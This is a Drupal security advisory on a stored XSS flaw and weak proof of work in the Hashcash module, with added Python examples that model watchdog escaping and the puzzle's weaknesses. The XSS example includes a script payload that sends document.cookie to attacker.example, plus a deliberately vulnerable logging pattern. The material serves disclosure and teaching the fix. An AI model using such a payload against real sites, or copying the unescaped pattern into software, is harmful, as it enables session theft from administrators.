Drupal Security Team, DRUPAL-SA-CONTRIB-2012-105
Published: Jun 27, 2012

SA-CONTRIB-2012-105 - Hashcash - Cross Site Scripting (XSS)

Source: www.drupal.org

CVSS2: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Attack Vector: Network
Attack Complexity: High
Authentication: None
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
EPSS: 0.002 (percentile 60.2%)

The Hashcash project is an implementation of a Proof of Work (PoW), or puzzle, scheme in which users of a service have to do computational work before their request is granted. In the Drupal Hashcash module the service is form submission, and the proof of work is a token that produces a partial hash collision when concatenated with a given string. This is intended to stop spam submissions to a site.

Cross Site Scripting

When an invalid token is received and the setting “Log failed hashcash” is enabled, the rejected token is written to watchdog with incorrect placeholders: the attacker-supplied value reaches the stored message as raw markup instead of passing through one of watchdog's escaping placeholders.

Because the core Database logging (dblog) module renders watchdog messages on its administrative report pages, an attacker can submit a token containing script to any Hashcash-protected form and have it executed in the browser of an administrator who later views those pages (a stored, second-order XSS). Submitting the token requires no authentication.

Mitigation: The setting “Log failed hashcash” is disabled by default, so sites that never enabled it are not exposed to the cross site scripting.
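The placeholder point above, as an added example in Python (modelling Drupal's behaviour; this is not the Hashcash module's own code, which is PHP). Drupal's watchdog() stores a message template plus a variables array and renders them later on the dblog report pages; in that rendering, `@name` and `%name` placeholders are HTML-escaped while `!name` placeholders and anything concatenated directly into the template are emitted verbatim. The message text, the variable name `@token`, and the concatenation form of the bug are assumptions for illustration; the advisory only states that the placeholders were incorrect.

```python
"""Added example, not code from the Hashcash module: how the choice of
watchdog() placeholder decides whether a logged token becomes stored XSS.

format_string() below is a small model of Drupal 7's format_string():
'@x' and '%x' placeholders are HTML-escaped, '!x' placeholders are raw.
Message text and variable names are assumed for illustration.
"""
import html
import re


def format_string(template: str, variables: dict) -> str:
    """Model of Drupal 7 format_string(): '@x' and '%x' escape, '!x' is raw."""
    if not variables:
        return template

    def substitute(match: re.Match) -> str:
        key = match.group(0)
        value = variables[key]
        if key.startswith('@'):
            return html.escape(value, quote=True)
        if key.startswith('%'):
            return '<em class="placeholder">' + html.escape(value, quote=True) + '</em>'
        return value  # '!' placeholder: the caller vouches the value is safe HTML

    pattern = '|'.join(re.escape(k) for k in sorted(variables, key=len, reverse=True))
    return re.sub(pattern, substitute, template)


# Constructed attacker input: a token that cannot pass the hashcash check, so
# with "Log failed hashcash" enabled its value is written to watchdog.
EVIL_TOKEN = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def log_failed_token_vulnerable(token: str) -> str:
    """Pattern the advisory describes (modelled as concatenation): the untrusted
    token becomes part of the template instead of an escaping placeholder."""
    return format_string('Hashcash: invalid token ' + token, {})


def log_failed_token_fixed(token: str) -> str:
    """Same log entry with the token routed through an escaping '@' placeholder."""
    return format_string('Hashcash: invalid token @token', {'@token': token})


def contains_active_script(rendered_message: str) -> bool:
    """True if the rendered message still carries a live <script> tag."""
    return '<script' in rendered_message.lower()


if __name__ == '__main__':
    print(log_failed_token_vulnerable(EVIL_TOKEN))  # script tag reaches the admin page
    print(log_failed_token_fixed(EVIL_TOKEN))       # shown as &lt;script&gt;... text
```

The fix is the same in real Drupal code: pass untrusted values to watchdog() through `@` or `%` placeholders and never through `!` or string concatenation, because the escaping happens at render time on the administrator's page.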

Insufficient proof of work

The Hashcash project also fails as a proper proof-of-work scheme:

  • A token chosen at random is accepted as correct with probability 1 in 256, so a spambot can guess instead of computing.
  • The gap in resources between a legitimate user running the JavaScript hash implementation in a browser and an optimal attacker using a GPGPU implementation is so large that the cost of computing a Hashcash token is negligible for the attacker.

The protection against spambots offered by the Drupal Hashcash project therefore hinges on a lack of interest on the part of an attacker, not on the cost of the work.
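Both weaknesses above, as an added example in Python (not the Hashcash module's code). The puzzle format is assumed, since the page does not give the module's exact scheme: a token is valid when SHA-1(challenge || token) starts with at least `bits` zero bits. A verifier that demands only 8 bits accepts a random token 1 time in 256; raising the difficulty closes the guessing hole but leaves the speed gap between a browser and a GPU, which the assumed hash rates at the end illustrate.

```python
"""Added example, not the Hashcash module's code: a hashcash-style puzzle
verifier and miner used to show both proof-of-work weaknesses.

Assumed puzzle: token is valid when SHA-1(challenge || token) has at least
`bits` leading zero bits. The challenge string and hash rates are constructed
for illustration.
"""
import hashlib
import random


def leading_zero_bits(digest: bytes) -> int:
    """Number of zero bits at the start of a digest."""
    count = 0
    for byte in digest:
        if byte == 0:
            count += 8
            continue
        count += 8 - byte.bit_length()
        break
    return count


def verify(challenge: str, token: str, bits: int) -> bool:
    """Server-side check: partial collision of at least `bits` leading zeros."""
    digest = hashlib.sha1((challenge + token).encode()).digest()
    return leading_zero_bits(digest) >= bits


def mine(challenge: str, bits: int) -> tuple:
    """Honest client: count up until a token verifies; returns (token, attempts)."""
    counter = 0
    while True:
        token = str(counter)
        if verify(challenge, token, bits):
            return token, counter + 1
        counter += 1


def guess_acceptance_rate(challenge: str, bits: int, trials: int, seed: int = 1) -> float:
    """Fraction of purely random tokens that a verifier of difficulty `bits` accepts."""
    rng = random.Random(seed)
    hits = sum(verify(challenge, format(rng.getrandbits(64), 'x'), bits) for _ in range(trials))
    return hits / trials


def expected_seconds(bits: int, hashes_per_second: float) -> float:
    """Expected solve time: about 2**bits hashes on average at the given rate."""
    return (2 ** bits) / hashes_per_second


if __name__ == '__main__':
    challenge = 'form-id:node_form:nonce:8f1c'  # constructed sample challenge
    token, attempts = mine(challenge, 16)
    print(f'16-bit token {token} found after {attempts} hashes')
    rate = guess_acceptance_rate(challenge, 8, 50_000)
    print(f'8-bit verifier accepts random tokens at rate {rate:.4f} (1/256 = {1 / 256:.4f})')
    # Assumed illustrative rates: browser JavaScript SHA-1 vs a GPU implementation.
    for bits in (8, 20, 24):
        print(f'{bits} bits: browser ~{expected_seconds(bits, 1e5):.2f}s, '
              f'GPU ~{expected_seconds(bits, 1e9):.6f}s')
```

The difficulty has to be tuned for the slowest legitimate client, so any setting a browser can solve in a few seconds costs a GPU-equipped attacker microseconds per form submission; that is the resource discrepancy the advisory refers to.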

CVE: CVE-2012-4469

Versions affected

  • Hashcash 6.x-2.x versions prior to 6.x-2.6
  • Hashcash 7.x-2.x versions prior to 7.x-2.2

Drupal core is not affected. If you do not use the contributed Hashcash module, there is nothing you need to do.

Solution

To solve the cross site scripting issue, install the latest version:

  • If you use the Hashcash module for Drupal 6.x, upgrade to Hashcash 6.x-2.6
  • If you use the Hashcash module for Drupal 7.x, upgrade to Hashcash 7.x-2.2

There is no solution for the insufficient proof of work; it is inherent in the scheme as implemented. You need to consider the consequences of this for your sites and should not rely on Hashcash as the only anti-spam control.

Also see the Hashcash project page.

Reported by

Fixed by

